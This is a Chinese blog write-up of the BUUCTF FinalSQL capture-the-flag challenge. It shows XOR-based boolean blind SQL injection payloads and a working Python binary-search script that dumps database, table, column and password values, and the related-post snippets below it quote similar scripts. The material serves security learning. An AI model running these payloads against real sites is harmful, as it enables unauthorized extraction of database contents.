第五十八题——[极客大挑战 2019]FinalSQL

最新推荐文章于 2024-02-23 21:33:47 发布
最新推荐文章于 2024-02-23 21:33:47 发布
阅读量777 收藏 8
点赞数
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/116525525
版权

SQL注入 盲注 ASCII码 信息泄露 数据库安全
关键词由CSDN通过智能技术生成
题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,看到sql测试框,以及1,2,3,4,5超链接

在这里插入图片描述

第二步:测试漏洞点

点击1超链接后出现NO! Not this! Click others~~~字样,在URL地址栏添加^2后发现注入点
在这里插入图片描述

第三步:获取flag

  1. 由于^一般适用于盲注猜测ASCII码值,所以这里使用盲注获取flag
  2. 手动测试回显字样:输入http://d9cc6ff9-ac2f-4193-985d-dce132ad08bd.node3.buuoj.cn/search.php?id=1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>1)^1发现出现NO! Not this! Click others~~~字样,说明猜测成功会出现这样的语句
  3. 使用python脚本获取表名
import re
import requests
import string

url = "http://55e943c2-e940-4f03-baf2-d0401c02f939.node3.buuoj.cn/search.php"
flag = ''

def payload(i, j):
    sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)
结果:
information_schema,mysql,performance_schema,test,geek
  1. 使用geek数据库获取表名,修改代码为:sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j),结果:F1naI1y,Flaaaaag
  2. 使用F1nal1y表获取列名:sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)结果:id,username,password
  3. 获取password里面的flag:sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j),结果:cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{ba273fbb-d4d3-4d3b-8477-d334b538ed79}

技术要点:

通过substr(xxx,a,1),将xxx获取到的信息从第a个一个一个拆分,通过ord获取到ascii码值,在对其进行比较,通过2分查找法以及回显的文本确定其具体ascii

想学习安全的小白
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
[极客挑战 2019]web部分解(已完结!),网络安全开发面试基础
m0_60635224的博客
04-08 1017
那直接打指令找一下吧:cat /flag和的这里我会讲解我理解下的内容,如果有兴趣的师傅建议去原文看一下,其中我真的很喜欢士别三日博客的一句话,真的建议每一位Ctfer记住!
BUUCTF [极客挑战 2019]FinalSQL
qq_60829702的博客
10-21 1293
因为之前的几道盲注目我都是直接看师傅的wp拿来用的,现在自己写一下发现果然光看不如去写。只有自己真正的去写了脚本才会发现一些东西永远都是看起来简单的一批,但是真正的让自己独立写出来还是有点难度的。毕竟那是别人的东西不是自己的东西,我们要把其他师傅的知识变成我们自己的。本人菜鸟一枚,虽然花了挺多时间写这个目和wp的,但是收获到了很多东西,也希望我能坚持下来。
BUUCTF-[极客挑战 2019]FinalSQL
weixin_44016181的博客
09-15 391
除了普通的注入流程,报错注入,时间注入外,这涉及了布尔注入当中的异或注入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的注入方式得到flag。
sql注入 [极客挑战 2019]FinalSQL1
m0_75178803的博客
02-23 915
逻辑符号|会被检测到,而&感觉成了注释符,&之后的内容都被替换掉了。直接盲注比较慢,还需要利用二分法来编写脚本。这里直接令传入的id=6。传入id=1^1^1。这里利用到大佬的脚本。运行一下得到flag。
BUUCTF [极客挑战 2019]EasySQL
m0_49025459的博客
04-06 268
目 这啊很快奥,我就想用个永真表达式测试一次,结果一下子就出来了 admin' or '1'='1 登录
[极客挑战 2019]FinalSQL 1
shinygod的博客
04-01 1018
知识点:异或盲注 分析 这边的两个框,试了半天啥东西都没有。 看了大佬的wp,在这注入,而且还时异或盲注。 异或盲注原理 1^1返回0 1^0返回1 所以我们可以通过判断返回的字符来异或盲注。 payload 判断数据库长度,如果(length(database())={0})等于1,说明数据库长度已经出来,则1^1为0,页面回显ERROR #数据库长度 import requests; for i in range(1,20): url = "http://058f339f-0127
盲注脚本爆数据库之[极客挑战 2019]FinalSQL
qq_58970968的博客
08-11 446
当过滤的东西很多很多的时候,可以考虑盲注,用 ^ 来判断是否可以进行脚本注入;使用二分法查找数据库的每一个字母;到时候只需要改回显的关键字和url就行。
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
第三届 Apache Flink 极客挑战赛暨AAIG CUP——电商推荐“抱大腿”攻击识别亚军代码方案.zip
最新发布
06-23
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请...
[极客挑战 2019]FinalSQL1 wp
m0_55185160的博客
08-06 228
我们打开网页,用admin和'1去试 结果给我们返回的报错为 于是我再次输入admin ,passward进行登录结果报错还是一样, 之后把admin改* 结果报错信息还是一,样, 又因为本为fianlSQL,可能存在盲注。 于是借助了大佬的脚本, import requests url = 'http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php' flag = '' for i in range(1,250)
[SQL盲注][极客挑战 2019]FinalSQL(二分法)
Y4tacker的博客
08-16 6123
发现过滤了一堆比如*空格之类的我们用()绕过上脚本, 网站太垃圾了请求的快,就要出错,还要加一个sleep等一下 import time import requests url = "http://34e5371d-f910-48da-ae2e-26ed2b56eb8d.node3.buuoj.cn/search.php?id=" result = '' i = 0 while True: i = i + 1 head = 32 tail = 127 while h
BUUCTF 个人做记录【7-03】
qq_61620566的博客
07-03 1444
学习才会进步
[极客挑战 2019]FinalSQL wp
{OvEr}的博客
11-19 418
[极客挑战 2019]FinalSQL wp 终极sql注入了,考点是盲注(写脚本的那种இ௰இ) 打开网页是这样的。 那个红色的卡片,我们随便点进去看看,直接点最后一个吧。 通过url判断注入点是id。 接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。 当我们输入id=1^1时,回显"Error" 当我们输入id=1^0时,回显正常 接下来我们进行盲注,下面是大神的脚本 step 1爆数据库 import requests u
[极客挑战 2019]FinalSQL(bypass盲注)
qq_56313338的博客
09-06 733
这里是数字型注入,使用异或进行爆破
[极客挑战 2019]FinalSQL
qq_52907838的博客
07-27 1589
打开环境,看目就知道是个SQL,有个登录框,上面还有5个选项: 依次点击一下: 这是我们注意到上面的参数值在随之变化: 他说在下一个,我们就改成id=6看看: 说明注入点应该是在id这个位置,我们输入:id=6' 显示:Error! 说明存在SQL注入,接着:id=6'or 1=1# 显示:你可别被我逮住了,臭弟弟,说明存在过滤,那过滤了哪些呢?我们来试一下,发现过滤了空格,等号,or,and,union,select这些都过滤得差不多了,...
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个目,它是一个简单的 SQL 数据库查询目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值